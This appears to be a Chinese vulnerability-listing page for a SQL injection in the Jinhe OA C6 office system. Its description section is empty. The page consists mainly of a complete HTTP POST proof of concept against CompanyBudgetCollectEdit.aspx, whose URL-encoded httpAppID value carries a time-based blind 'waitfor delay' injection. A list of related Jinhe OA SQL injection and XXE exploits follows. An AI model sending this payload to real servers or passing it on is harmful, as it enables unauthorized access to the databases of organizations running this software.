金和OA CompanyBudgetCollectEdit.aspx SQL注入漏洞

漏洞描述

PoC代码

POST /c6/JHSoft.Web.CostControl/Collect/CompanyBudgetCollectEdit.aspx/ HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36

httpAppID=%31%3b%20%77%61%69%74%66%6f%72%20%64%65%6c%61%79%27%30%3a%30%3a%36%27%2d%2d&httpOID=1

相关漏洞推荐

• 金和OA CompanyBudgetCollect.aspx SQL注入漏洞
• 金和OA AjaxForCenterBudgetDecompose.ashx SQL注入漏洞
• POC 金和OA ProductImport.aspx XXE漏洞
• 金和OA ProjectImport.aspx XXE漏洞
• 金和OA ProjectPlanReportDetail.aspx 存在SQL注入漏洞
• 金和OA CostReimbursementHandler.ashx 存在SQL注入
• 金和OA CompanyBudgetCollectEdit.aspx 存在SQL注入漏洞
• 金和OA ContractImport.aspx XXE漏洞
• 金和OA CertificateModify.aspx SQL注入漏洞
• POC 金和OA CustomerImport.aspx XXE漏洞
• POC 金和OA C6系统 AjaxForCompanyCollect.ashx SQL注入漏洞
• POC 金和OA C6系统 AjaxForDepartmentCollect.ashx SQL注入漏洞
• 金和OA BookGetStoreType.aspx SQL注入漏洞